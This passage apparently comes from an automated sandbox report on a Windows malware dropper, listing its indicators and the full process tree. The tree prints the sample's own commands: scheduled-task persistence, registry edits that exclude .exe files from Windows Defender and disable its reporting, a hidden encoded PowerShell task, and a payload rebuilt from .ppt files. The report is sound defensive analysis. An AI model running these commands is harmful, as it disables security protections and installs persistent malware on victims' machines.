0b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 7wVI48VCwJ9w72CizNe2qMzH.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 136 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 149 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeoRpZT4JOyYYRhdm6Ij1xn9rf.exepid process 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3164 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
_6Sd1ObpGBfxX6magicg8HXA.exepid process 3552 _6Sd1ObpGBfxX6magicg8HXA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeaOq3NKzzgsc0kr0WmG6Inwu5.exeNjL9om5oW1wkxRRoKko9Vo4J.exeE1nU3xPJU4n3P2bLkKPbMvMG.exe_6Sd1ObpGBfxX6magicg8HXA.exeGttFQbsjSsnUtS6UR_TTN24W.exeGttFQbsjSsnUtS6UR_TTN24W.exeInstall.exeInstall.exelogger2.exerundll32.exeforfiles.exeforfiles.exeNostra.exe.pifou3mEGYcRJWtjJmVA3g2DBOG.exetaskkill.exeliyong.exeTrdngAnlzr2249.exehandselfdiy_8.exedescription pid process Token: SeDebugPrivilege 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe Token: SeDebugPrivilege 1780 7wVI48VCwJ9w72CizNe2qMzH.exe Token: SeDebugPrivilege 3632 aOq3NKzzgsc0kr0WmG6Inwu5.exe Token: SeDebugPrivilege 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe Token: SeDebugPrivilege 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe Token: SeDebugPrivilege 3552 _6Sd1ObpGBfxX6magicg8HXA.exe Token: SeDebugPrivilege 3188 GttFQbsjSsnUtS6UR_TTN24W.exe Token: SeDebugPrivilege 4800 GttFQbsjSsnUtS6UR_TTN24W.exe Token: SeDebugPrivilege 532 Install.exe Token: SeDebugPrivilege 2608 Install.exe Token: SeDebugPrivilege 5072 logger2.exe Token: SeDebugPrivilege 5072 logger2.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 3988 rundll32.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 212 forfiles.exe Token: SeDebugPrivilege 1536 forfiles.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 2368 Nostra.exe.pif Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 2004 ou3mEGYcRJWtjJmVA3g2DBOG.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 3908 taskkill.exe Token: SeDebugPrivilege 3908 taskkill.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 5048 liyong.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 Token: SeDebugPrivilege 2588 TrdngAnlzr2249.exe Token: SeCreateTokenPrivilege 4892 handselfdiy_8.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
Nostra.exe.pifpid process 2368 Nostra.exe.pif 3164 3164 2368 Nostra.exe.pif 2368 Nostra.exe.pif 3164 3164 3164 3164 3164 3164 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Nostra.exe.pifpid process 2368 Nostra.exe.pif 2368 Nostra.exe.pif 2368 Nostra.exe.pif -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
GttFQbsjSsnUtS6UR_TTN24W.exeGttFQbsjSsnUtS6UR_TTN24W.exeliyong.exeConhost.exepid process 3188 GttFQbsjSsnUtS6UR_TTN24W.exe 3188 GttFQbsjSsnUtS6UR_TTN24W.exe 4800 GttFQbsjSsnUtS6UR_TTN24W.exe 4800 GttFQbsjSsnUtS6UR_TTN24W.exe 5048 liyong.exe 5048 liyong.exe 1900 Conhost.exe 1900 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeNjL9om5oW1wkxRRoKko9Vo4J.execmd.exeGttFQbsjSsnUtS6UR_TTN24W.exeE1nU3xPJU4n3P2bLkKPbMvMG.exeInstall.execmd.exerundll32.exeInstall.exedescription pid process target process PID 3104 wrote to memory of 1780 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 7wVI48VCwJ9w72CizNe2qMzH.exe PID 3104 wrote to memory of 1780 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 7wVI48VCwJ9w72CizNe2qMzH.exe PID 3104 wrote to memory of 1780 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 7wVI48VCwJ9w72CizNe2qMzH.exe PID 3104 wrote to memory of 2232 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 3104 wrote to memory of 2232 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 3104 wrote to memory of 2232 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 3104 wrote to memory of 1700 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 3104 wrote to memory of 1700 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 3104 wrote to memory of 1700 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe schtasks.exe PID 1780 wrote to memory of 2932 1780 7wVI48VCwJ9w72CizNe2qMzH.exe oRpZT4JOyYYRhdm6Ij1xn9rf.exe PID 1780 wrote to memory of 2932 1780 7wVI48VCwJ9w72CizNe2qMzH.exe oRpZT4JOyYYRhdm6Ij1xn9rf.exe PID 1780 wrote to memory of 2600 1780 7wVI48VCwJ9w72CizNe2qMzH.exe NjL9om5oW1wkxRRoKko9Vo4J.exe PID 1780 wrote to memory of 2600 1780 7wVI48VCwJ9w72CizNe2qMzH.exe NjL9om5oW1wkxRRoKko9Vo4J.exe PID 1780 wrote to memory of 2600 1780 7wVI48VCwJ9w72CizNe2qMzH.exe NjL9om5oW1wkxRRoKko9Vo4J.exe PID 1780 wrote to memory of 3632 1780 7wVI48VCwJ9w72CizNe2qMzH.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe PID 1780 wrote to memory of 3632 1780 7wVI48VCwJ9w72CizNe2qMzH.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe PID 1780 wrote to memory of 3632 1780 7wVI48VCwJ9w72CizNe2qMzH.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe PID 2600 wrote to memory of 4748 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe dllhost.exe PID 2600 wrote to memory of 4748 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe dllhost.exe PID 2600 wrote to memory of 4748 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe dllhost.exe PID 1780 wrote to memory of 2828 1780 7wVI48VCwJ9w72CizNe2qMzH.exe E1nU3xPJU4n3P2bLkKPbMvMG.exe PID 1780 wrote to memory of 2828 1780 7wVI48VCwJ9w72CizNe2qMzH.exe E1nU3xPJU4n3P2bLkKPbMvMG.exe PID 1780 wrote to memory of 2828 1780 7wVI48VCwJ9w72CizNe2qMzH.exe E1nU3xPJU4n3P2bLkKPbMvMG.exe PID 2600 wrote to memory of 3508 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe cmd.exe PID 2600 wrote to memory of 3508 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe cmd.exe PID 2600 wrote to memory of 3508 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe cmd.exe PID 1780 wrote to memory of 3552 1780 7wVI48VCwJ9w72CizNe2qMzH.exe _6Sd1ObpGBfxX6magicg8HXA.exe PID 1780 wrote to memory of 3552 1780 7wVI48VCwJ9w72CizNe2qMzH.exe _6Sd1ObpGBfxX6magicg8HXA.exe PID 1780 wrote to memory of 3552 1780 7wVI48VCwJ9w72CizNe2qMzH.exe _6Sd1ObpGBfxX6magicg8HXA.exe PID 1780 wrote to memory of 3188 1780 7wVI48VCwJ9w72CizNe2qMzH.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 1780 wrote to memory of 3188 1780 7wVI48VCwJ9w72CizNe2qMzH.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 1780 wrote to memory of 3188 1780 7wVI48VCwJ9w72CizNe2qMzH.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 3508 wrote to memory of 1556 3508 cmd.exe cmd.exe PID 3508 wrote to memory of 1556 3508 cmd.exe cmd.exe PID 3508 wrote to memory of 1556 3508 cmd.exe cmd.exe PID 3188 wrote to memory of 4800 3188 GttFQbsjSsnUtS6UR_TTN24W.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 3188 wrote to memory of 4800 3188 GttFQbsjSsnUtS6UR_TTN24W.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 3188 wrote to memory of 4800 3188 GttFQbsjSsnUtS6UR_TTN24W.exe GttFQbsjSsnUtS6UR_TTN24W.exe PID 2828 wrote to memory of 532 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe Install.exe PID 2828 wrote to memory of 532 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe Install.exe PID 2828 wrote to memory of 532 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe Install.exe PID 532 wrote to memory of 2608 532 Install.exe Install.exe PID 532 wrote to memory of 2608 532 Install.exe Install.exe PID 532 wrote to memory of 2608 532 Install.exe Install.exe PID 1556 wrote to memory of 5072 1556 cmd.exe logger2.exe PID 1556 wrote to memory of 5072 1556 cmd.exe logger2.exe PID 1556 wrote to memory of 5072 1556 cmd.exe logger2.exe PID 1556 wrote to memory of 3352 1556 cmd.exe cmd.exe PID 1556 wrote to memory of 3352 1556 cmd.exe cmd.exe PID 1556 wrote to memory of 3352 1556 cmd.exe cmd.exe PID 1780 wrote to memory of 4504 1780 7wVI48VCwJ9w72CizNe2qMzH.exe svchost.exe PID 1780 wrote to memory of 4504 1780 7wVI48VCwJ9w72CizNe2qMzH.exe svchost.exe PID 4444 wrote to memory of 3988 4444 rundll32.exe rundll32.exe PID 4444 wrote to memory of 3988 4444 rundll32.exe rundll32.exe PID 4444 wrote to memory of 3988 4444 rundll32.exe rundll32.exe PID 1556 wrote to memory of 3808 1556 cmd.exe findstr.exe PID 1556 wrote to memory of 3808 1556 cmd.exe findstr.exe PID 1556 wrote to memory of 3808 1556 cmd.exe findstr.exe PID 2608 wrote to memory of 1536 2608 Install.exe forfiles.exe PID 2608 wrote to memory of 1536 2608 Install.exe forfiles.exe PID 2608 wrote to memory of 1536 2608 Install.exe forfiles.exe PID 2608 wrote to memory of 212 2608 Install.exe forfiles.exe PID 2608 wrote to memory of 212 2608 Install.exe forfiles.exe PID 2608 wrote to memory of 212 2608 Install.exe forfiles.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe"C:\Users\Admin\AppData\Local\Temp\93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\7wVI48VCwJ9w72CizNe2qMzH.exe"C:\Users\Admin\Documents\7wVI48VCwJ9w72CizNe2qMzH.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\oRpZT4JOyYYRhdm6Ij1xn9rf.exe"C:\Users\Admin\Pictures\Adobe Films\oRpZT4JOyYYRhdm6Ij1xn9rf.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\NjL9om5oW1wkxRRoKko9Vo4J.exe"C:\Users\Admin\Pictures\Adobe Films\NjL9om5oW1wkxRRoKko9Vo4J.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Questo.ppt & ping -n 5 localhost4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 56⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pifNostra.exe.pif f6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pif7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost5⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\dllhost.exedllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer8473454⤵
-
C:\Users\Admin\Pictures\Adobe Films\aOq3NKzzgsc0kr0WmG6Inwu5.exe"C:\Users\Admin\Pictures\Adobe Films\aOq3NKzzgsc0kr0WmG6Inwu5.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 5844⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 8404⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 8444⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 9124⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 9204⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 10684⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 3244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 10684⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 14004⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 8724⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "aOq3NKzzgsc0kr0WmG6Inwu5.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\aOq3NKzzgsc0kr0WmG6Inwu5.exe.dat" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "aOq3NKzzgsc0kr0WmG6Inwu5.exe" /f5⤵
- Loads dropped DLL
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\E1nU3xPJU4n3P2bLkKPbMvMG.exe"C:\Users\Admin\Pictures\Adobe Films\E1nU3xPJU4n3P2bLkKPbMvMG.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS218D.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS25D3.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUKAFHMZv" /SC once /ST 07:58:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUKAFHMZv"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUKAFHMZv"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcyLPxSbowNIYSAEXo" /SC once /ST 20:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\wcgyCzQ.exe\" Qa /site_id 525403 /S" /V1 /F6⤵
- Enumerates connected drives
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\GttFQbsjSsnUtS6UR_TTN24W.exe"C:\Users\Admin\Pictures\Adobe Films\GttFQbsjSsnUtS6UR_TTN24W.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\GttFQbsjSsnUtS6UR_TTN24W.exe"C:\Users\Admin\Pictures\Adobe Films\GttFQbsjSsnUtS6UR_TTN24W.exe" help4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\_6Sd1ObpGBfxX6magicg8HXA.exe"C:\Users\Admin\Pictures\Adobe Films\_6Sd1ObpGBfxX6magicg8HXA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\QhoCaQiIF04COMyjxVXgK7y6.exe"C:\Users\Admin\Pictures\Adobe Films\QhoCaQiIF04COMyjxVXgK7y6.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4504 -s 9084⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\ou3mEGYcRJWtjJmVA3g2DBOG.exe"C:\Users\Admin\Pictures\Adobe Films\ou3mEGYcRJWtjJmVA3g2DBOG.exe"3⤵
- Executes dropped EXE
